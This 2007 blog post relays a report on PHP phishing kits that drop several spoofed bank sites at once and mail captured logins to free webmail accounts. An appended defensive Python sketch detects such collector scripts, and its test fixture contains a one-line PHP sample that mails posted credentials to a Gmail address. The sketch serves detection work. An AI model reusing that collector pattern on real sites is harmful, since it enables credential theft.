Tuesday, July 10, 2007

Phishing Kits Getting Better

Via Infoworld.com -

Software developers like to make installation of their programs simple and quick. So do hackers.

Analysts at RSA Security early last month spotted a single piece of PHP code that installs a phishing site on a compromised server in about two seconds, the vendor noted in its monthly online fraud report for June, released on Tuesday.

The code contains all of the HTML (Hypertext Markup Language) and graphics needed for the fraudulent Web site, which spoofed a financial institution that RSA did not name in the report. The ".exe" file automatically installs the code and graphics in the right directories, RSA said.

---------------------------------

This isn't new information to me, but I think most people don't understand how slick phishers are becoming. In my time with PIRT, I saw numerous phishing kits. Many were PHP-based and would contain 2 to 5 different phishing sites in them. The install would expand and drop all the phishing files in separate directories used to target different companies.

A single kit could deploy an HSBC, PayPal, and a Bank of America phishing site all at the same time. All with the click of an unzip button.

All of these separate phishing sites (stored in their own directory structures) would use the same backend collection scripts (again, mostly PHP-based), which would format the user/pass data and then mail it off to free e-mail accounts (commonly Gmail or Yahoo accounts).

I haven't been active in the anti-phishing community for quite some time, so I can only guess how advanced they are getting now.
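
A defender's sketch of the kit layout described above, added here as an example and not code from the original post or from RSA: it sweeps a web root for PHP files that read posted form fields and mail them to a Gmail or Yahoo address, then reports identical copies found in more than one directory. The function names, the regex heuristics and the sample tree are assumptions constructed for illustration.

```python
import hashlib
import re
from collections import defaultdict
from pathlib import Path

# Heuristics taken from the post's description: a PHP script that reads
# posted form fields and mails them to a free webmail account.
MAIL_CALL = re.compile(rb"\bmail\s*\(", re.I)
POST_READ = re.compile(rb"\$_(POST|REQUEST)\b")
FREE_MAIL = re.compile(rb"[\w.+-]+@(gmail|yahoo)\.com", re.I)

def find_collectors(webroot):
    """Return {sha256: sorted relative paths} for suspect PHP files."""
    root = Path(webroot)
    hits = defaultdict(list)
    for path in root.rglob("*.php"):
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
        if MAIL_CALL.search(data) and POST_READ.search(data) and FREE_MAIL.search(data):
            digest = hashlib.sha256(data).hexdigest()
            hits[digest].append(str(path.relative_to(root)))
    return {h: sorted(p) for h, p in hits.items()}

def shared_collectors(webroot):
    """Collectors whose identical copy sits in 2+ directories (multi-brand kit)."""
    return {h: p for h, p in find_collectors(webroot).items()
            if len({str(Path(x).parent) for x in p}) >= 2}

if __name__ == "__main__":
    import tempfile
    # Constructed sample tree: two brand directories sharing one collector,
    # plus a benign contact form that mails a non-webmail address.
    collector = b'<?php mail("constructed-sample@gmail.com", "s", $_POST["user"]); ?>'
    benign = b'<?php mail("support@example.org", "contact", $_POST["msg"]); ?>'
    with tempfile.TemporaryDirectory() as d:
        for brand in ("bank-a", "bank-b"):
            (Path(d) / brand).mkdir()
            (Path(d) / brand / "login.php").write_bytes(collector)
        (Path(d) / "contact.php").write_bytes(benign)
        for digest, paths in shared_collectors(d).items():
            print(digest[:12], paths)
```

A hit from `find_collectors` alone is only a lead, since legitimate contact forms can match; the same file hash appearing under several sibling directories is the stronger signal.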
